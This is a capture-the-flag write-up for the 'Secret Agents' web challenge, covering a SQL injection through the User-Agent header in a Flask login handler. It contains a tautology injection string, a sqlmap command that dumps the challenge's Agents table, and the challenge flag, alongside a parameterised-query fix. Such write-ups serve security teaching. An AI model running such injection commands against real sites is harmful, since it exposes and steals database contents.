Secret Agents [web]

Secret Agents

Can you enter the secret agent portal? I've heard someone has a flag. Our insider leaked the source, but was "terminated" shortly thereafter...

Recon

We are provided the source code of the Flask webserver. There is an SQL injection on the following line, where u is formatted directly into the query string:

for r in cursor.execute("SELECT * FROM Agents WHERE UA='%s'"%(u), multi=True):
    if r.with_rows:
        res = r.fetchall()
        conn.close()
        break

if len(res) == 0:
    return render_template("login.html", msg="stop! you're not allowed in here >:)")

if len(res) > 1:
    return render_template("login.html", msg="hey! close, but no bananananananananana!!!! (there are many secret agents of course)")
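
The root cause and its fix, as an added example that is not part of the challenge source: the same query built by string formatting and with a bound parameter. It uses an in-memory sqlite3 database as a stand-in for the challenge's database; the Name column, the sample rows and the function names are assumptions.

```python
import sqlite3

def make_db():
    # Constructed sample data. Only the Agents table and the UA column come
    # from the snippet above; the Name column is an assumption.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Agents (Name TEXT, UA TEXT)")
    conn.executemany(
        "INSERT INTO Agents VALUES (?, ?)",
        [("alice", "ua-alpha"), ("bob", "ua-bravo")],
    )
    return conn

def lookup_formatted(conn, u):
    # Same pattern as the challenge: u becomes part of the SQL text,
    # so a quote in u ends the string literal and the rest is parsed as SQL.
    return conn.execute("SELECT * FROM Agents WHERE UA='%s'" % (u)).fetchall()

def lookup_bound(conn, u):
    # Bound parameter: the driver sends u as a value, never as SQL.
    # sqlite3 uses ? as the placeholder; MySQL drivers use %s, with the
    # value passed as a separate argument to execute().
    return conn.execute("SELECT * FROM Agents WHERE UA=?", (u,)).fetchall()

def login_rows(conn, u):
    # Core of a hardened handler: accept only an exact, single match.
    rows = lookup_bound(conn, u)
    return rows if len(rows) == 1 else []

if __name__ == "__main__":
    conn = make_db()
    crafted = "x' OR '1'='1"  # constructed input containing a quote
    print("formatted:", lookup_formatted(conn, crafted))  # predicate rewritten
    print("bound:    ", lookup_bound(conn, crafted))      # compared as a literal
    print("login:    ", login_rows(conn, "ua-alpha"))
```

In the original handler the fix is the same change applied to cursor.execute, and dropping multi=True also prevents more than one statement from running per call.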

Solution

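We can use sqlmap, with the * in the User-Agent value marking the injection point and the techniques limited to UNION-based and time-based: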

python sqlmap.py \
    --time-sec 3 \
    --technique "UT" \
    --flush-session \
    --dbms="mysql" \
    --user-agent="Spotless*" \
    -u "https://agents.2020.chall.actf.co/login" \
    -T Agents --columns --dump

Flag

actf{nyoom_1_4m_sp33d}